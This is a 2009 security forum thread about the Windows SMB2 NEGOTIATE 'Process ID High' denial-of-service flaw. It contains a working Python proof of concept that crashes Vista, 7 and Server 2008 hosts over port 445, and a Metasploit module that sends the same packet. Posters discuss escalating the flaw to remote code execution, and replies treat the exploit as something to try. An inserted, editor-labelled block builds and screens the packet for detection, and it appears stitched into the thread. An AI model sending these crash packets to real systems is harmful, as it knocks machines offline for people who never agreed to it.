Exploits, Vulnerabilities & PoCs
#1
Windows Vista, 7 and 2008: SMB2 Remote Request PoC

An attacker can remotely crash any Vista/Windows 7 machine with SMB enabled.

BACKGROUND
-------------------------
Windows Vista and newer Windows versions come with a new SMB version named SMB2. See: Windows Vista networking technologies - Wikipedia, the free encyclopedia for more details.

DESCRIPTION
-------------------------
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to an SMB server, and it is used to identify the SMB dialect that will be used for further communication.

Code: Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
# it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
from socket import socket

host = ("IP_ADDR", 445)  # replace IP_ADDR with the target address

buff = (
    b"\x00\x00\x00\x90"  # NetBIOS session message, length 0x90 (144 bytes follow)
    b"\xff\x53\x4d\x42"  # Server Component: SMB
    b"\x72\x00\x00\x00"  # Command 0x72: Negotiate Protocol; NT Status (first 3 bytes)
    b"\x00\x18\x53\xc8"  # NT Status (last byte); Flags 0x18; Flags2 0xc853
    b"\x00\x26"          # Process ID High: --> :) normal value should be "\x00\x00"
    # Signature (8 bytes), Reserved (2), Tree ID 0xffff, Process ID 0xfeff
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    # User ID, Multiplex ID, WordCount 0, ByteCount 0x6d, then the dialect list:
    # PC NETWORK PROGRAM 1.0, LANMAN1.0, Windows for Workgroups 3.1a,
    # LM1.2X002, LANMAN2.1, NT LM 0.12, SMB 2.002
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    b"\x30\x30\x32\x00"
)

s = socket()
s.connect(host)
s.send(buff)
s.close()

PROOF OF CONCEPT

Last edited by MaXe; 8th September 2009 at 14:42. Reason: Title was updated since 2008 was confirmed to be exploitable as well.
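The packet layout the PoC relies on, as an added example: this is editor's code, not the PoC author's script or the Metasploit module. It builds the same NEGOTIATE PROTOCOL request from named fields, parses it back, and screens a captured request for a nonzero Process ID High the way a network sensor or IDS rule would. It assumes the standard 32-byte SMB1 header layout and NetBIOS session-service framing, and takes the PoC comment ("normal value should be \x00\x00") as the basis for the screening rule; the embedded packet is the byte string from the post above, nothing is sent over the network.

```python
# Added example (editor's code, not from the original post or Metasploit):
# build, parse and screen SMB1 NEGOTIATE PROTOCOL requests so the
# "Process ID High" field the PoC abuses can be located and checked.
# Assumptions: the fixed 32-byte SMB1 header, NetBIOS session framing, and
# the PoC comment that a normal client sends PID High = 0.
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
# Header after the 4-byte magic: Command, Status, Flags, Flags2, PIDHigh,
# Signature, Reserved, TID, PID, UID, MID (all little-endian)
HEADER_FMT = "<BIBHH8sHHHHH"

# Dialects exactly as listed in the PoC from the first post.
POC_DIALECTS = [
    b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"Windows for Workgroups 3.1a",
    b"LM1.2X002", b"LANMAN2.1", b"NT LM 0.12", b"SMB 2.002",
]

# The PoC packet from the first post, transcribed to hex (148 bytes).
POC_PACKET = bytes.fromhex(
    "00000090 ff534d42 72000000 001853c8 0026 0000000000000000 0000 ffff fffe"
    "0000 0000 00 6d00"
    "02 5043204e4554574f524b2050524f4752414d20312e30 00"
    "02 4c414e4d414e312e30 00"
    "02 57696e646f777320666f7220576f726b67726f75707320332e3161 00"
    "02 4c4d312e3258303032 00"
    "02 4c414e4d414e322e31 00"
    "02 4e54204c4d20302e3132 00"
    "02 534d4220322e303032 00"
)


def build_negotiate(dialects, pid_high=0, flags=0x18, flags2=0xC853,
                    tid=0xFFFF, pid=0xFEFF):
    """Return a NetBIOS-framed SMB1 NEGOTIATE request. pid_high=0 is what a
    normal client sends; the PoC uses 0x2600 (bytes 00 26, '&' in the high byte)."""
    header = SMB_MAGIC + struct.pack(
        HEADER_FMT, SMB_COM_NEGOTIATE, 0, flags, flags2, pid_high,
        b"\x00" * 8, 0, tid, pid, 0, 0)
    # Dialect buffer: each entry is 0x02 + NUL-terminated dialect name
    body = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    smb = header + struct.pack("<BH", 0, len(body)) + body  # WordCount, ByteCount
    return struct.pack(">I", len(smb)) + smb  # type 0x00 + 3-byte length


def parse_negotiate(packet):
    """Parse a NetBIOS-framed SMB1 NEGOTIATE request into its header fields
    and dialect list. Raises ValueError for anything not well-formed."""
    if len(packet) < 4 + 32 + 3:
        raise ValueError("too short for an SMB1 NEGOTIATE request")
    nb_type, nb_len = packet[0], int.from_bytes(packet[1:4], "big")
    if nb_type != 0 or nb_len != len(packet) - 4:
        raise ValueError("bad NetBIOS framing")
    smb = packet[4:]
    if smb[:4] != SMB_MAGIC:
        raise ValueError("not an SMB1 message")
    (cmd, status, flags, flags2, pid_high, _sig, _rsvd,
     tid, pid, uid, mid) = struct.unpack(HEADER_FMT, smb[4:32])
    if cmd != SMB_COM_NEGOTIATE:
        raise ValueError("not a NEGOTIATE request (command 0x%02x)" % cmd)
    word_count, byte_count = struct.unpack("<BH", smb[32:35])
    body = smb[35:]
    if word_count != 0 or byte_count != len(body):
        raise ValueError("WordCount/ByteCount do not match the payload")
    dialects = []
    while body:
        if body[0] != 0x02:
            raise ValueError("dialect entry does not start with 0x02")
        end = body.index(b"\x00", 1)  # ValueError if unterminated
        dialects.append(body[1:end])
        body = body[end + 1:]
    return {"status": status, "flags": flags, "flags2": flags2,
            "pid_high": pid_high, "tid": tid, "pid": pid, "uid": uid,
            "mid": mid, "dialects": dialects}


def screen(packet):
    """Classify one captured request as ('ok' | 'suspicious' | 'malformed', reason)."""
    try:
        req = parse_negotiate(packet)
    except ValueError as exc:
        return ("malformed", str(exc))
    if req["pid_high"] != 0:
        return ("suspicious",
                "Process ID High = 0x%04x (normal clients send 0)" % req["pid_high"])
    return ("ok", "Process ID High = 0")


if __name__ == "__main__":
    for label, pkt in (("PoC packet", POC_PACKET),
                       ("normal client", build_negotiate(POC_DIALECTS))):
        print(label, screen(pkt))
```

Building the PoC dialect list with pid_high=0x2600 reproduces the posted bytes exactly, which confirms that the crash packet differs from a benign negotiate only in those two bytes. The screening rule rests on the PoC comment that 0 is the normal value, so a detector deployed on a real network should be checked against the client population it watches before it alerts on every nonzero PID High.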
#2
Re: Windows Vista and 7: SMB2 Negotiate protocol

Very nice sniip3r, and even from the original source :-) CyberMaN (from #intern0t irc) has tested this and it worked!

This is where I got it from: Windows Vista / seven SMB Remote REQUEST zero day ? PenTestIT

I decoded the hex-code to make sure that it didn't contain any bad code:

Code:
����������ÿÿÿþ�����m�PC NETWORK PROGRAM 1.0�LANMAN1.0�Windows for Workgroups 3.1a�LM1.2X002�LANMAN2.1�NT LM 0.12�SMB 2.002�

http://pastie.org/609329

Here's a Metasploit port I made earlier today: http://pastie.org/609407

Keep in mind that it might not work, because I haven't tested it. However, I have sent this module to HD Moore in the hope that he will add it to the Metasploit framework and perhaps correct some of my bugged syntax, or check it out further to see if it should be possible to escalate the issue. Even though the only thing this PoC does is send a & sign through a remote request via the SMB (Server Message Block) service to a computer that runs SMB Version 2.0. If the machine does, it will crash with the following error-code: PAGE_FAULT_IN_NONPAGED_AREA.

UPDATE: The SMB header field that receives the & sign is named: "Process Id High".

Screenshot of Crash: (doesn't prove much though) http://m.blog.hu/bu/buhera/image/vista_smbv2.png

Articles about how the vulnerability could be used for Remote Code Execution:
http://www.reversemode.com/index.php...d=64&Itemid=15
http://blog.48bits.com/?p=510 (TRANSLATED!)

After reading the reversemode article, which said that we have 16 bits available which we can control, I began thinking.. Since a normal address in EIP is 4 bytes or 32 bits, we cannot use that, but we should be able to use jmps (assembly) instead! Those are usually only 16 bits (2 bytes) from what I can remember, and if you wonder how insane that is, 2 bytes could be = "12" (or "ab").

Of course it isn't much to play with, but I hope someone will be able to escalate this issue, would be nice :-) I might as well take a look if I can borrow a Vista machine from a friend, since I don't have any at home, only Linux xD :END OF UPDATE

The reason why I have split up the shell-code is to make it easier to read.

2ND UPDATE: In the code below:

Code:
buf5 = "\x00\x26"

is the ESI value we can control, which are the 16 bits that One said could be used for RCE. :END OF 2ND UPDATE

3RD UPDATE: HD Moore has made 2 modules in Metasploit! (No RCE yet though).
http://trac.metasploit.com/browser/f...ate_pidhigh.rb
http://trac.metasploit.com/browser/f...otiate_stop.rb
The Metasploit module I made / ported was fixed by: THeReVeReND :-) :END OF 3RD UPDATE

The code below has been fixed by: THeReVeReND

Code:
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Windows SMB2.0 SRV2.sys 0-day DoS',
      'Description'    => %q{
        This module exploits an "unknown" vulnerability in the SMB2.0 service on Windows.
        The vulnerability exists within the "Process ID High" field, which is 16 bits we can control.
        Ported by MaXe security@intern0t.net. Rewrite by THeReVeReND.
      },
      'Author'         => [ 'MaXe, THeReVeReND, credits to: Laurent Gaffié' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'URL', 'http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html' ],
        ],
      'DisclosureDate' => 'Sep 07 2009'
    ))

    register_options(
      [
        Opt::RPORT(445),
      ],
      self.class)
  end

  def run
    connect

    # NetBIOS session message followed by an SMB1 NEGOTIATE PROTOCOL request.
    # "\x00\x26" is the Process ID High field; a normal client sends "\x00\x00".
    dos = "\x00\x00\x00\x90" +  # NetBIOS session message, length 0x90
      "\xff\x53\x4d\x42" +      # Server Component: SMB
      "\x72\x00\x00\x00" +      # Command 0x72: Negotiate Protocol; NT Status (first 3 bytes)
      "\x00\x18\x53\xc8" +      # NT Status (last byte); Flags 0x18; Flags2 0xc853
      "\x00\x26" +              # Process ID High
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" + # Signature, Reserved, TID, PID
      "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" + # UID, MID, WordCount, ByteCount, dialects...
      "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" +
      "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" +
      "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" +
      "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" +
      "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" +
      "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" +
      "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" +
      "\x30\x30\x32\x00"

    sock.put(dos)
    disconnect
  end

end
__________________ Code: ____/____\_________________
\|/ | OMG IT'S TEH LEET STORY!! |
/*\ /\ -*- |______ ________/\_________|
// \\ / \ /|\ / \/ \ / \
/// \\\ / \ / \/ \
// \\ / \ / \o/ \ \
| | / \ / | \ \
___| |____/ \______/________/ \_______\_____\_________
/ o \
#"=-
/\
__________________________________________________________
On a mission, to find the lost member of Teh Unkwon..
#3
Re: Windows Vista, 7 and 2008: SMB2 Remote Request PoC

This looks sweet, nice post, I must try :D
#4
Re: Windows Vista, 7 and 2008: SMB2 Remote Request PoC

Update! As most people know, Immunity Inc has made a working exploit!

Here is a video presentation of the exploit: Immunity CANVAS SMBv2 Exploit (Vista/Server 2008)

HD Moore also tweeted: "looks like immunity has a working remote for SMB2: Immunity CANVAS Early Updates (metasploit should be done in the next week)"

Woot! I look forward to seeing it, and hopefully some comments on how it was done! xD

Reference:
[Dailydave] SMBv2 Remote Exploit Improvements
Twitter / HD Moore: looks like immunity has a ...
#5
Re: Windows Vista, 7 and 2008: SMB2 Remote Request PoC

Nice one brother, I must try this.
#6
Re: Windows Vista, 7 and 2008: SMB2 Remote Request PoC
I feel good I actually understood some of this xD
#7
Re: Windows Vista, 7 and 2008: SMB2 Remote Request PoC

Hehe, that's nice to hear CyberDevin :-) SecurityFocus put up my "ported" version of it too, heh: http://downloads.securityfocus.com/v...its/36299-2.rb Even though I also sent them a mail as soon as the Metasploit project had a better version implemented :-)
#8
Re: Windows Vista, 7 and 2008: SMB2 Remote Request PoC

Quote:
#9
Re: Windows Vista, 7 and 2008: SMB2 Remote Request PoC

It's Ruby, since Metasploit is written in Ruby, and it is also the largest project ever made in Ruby :-)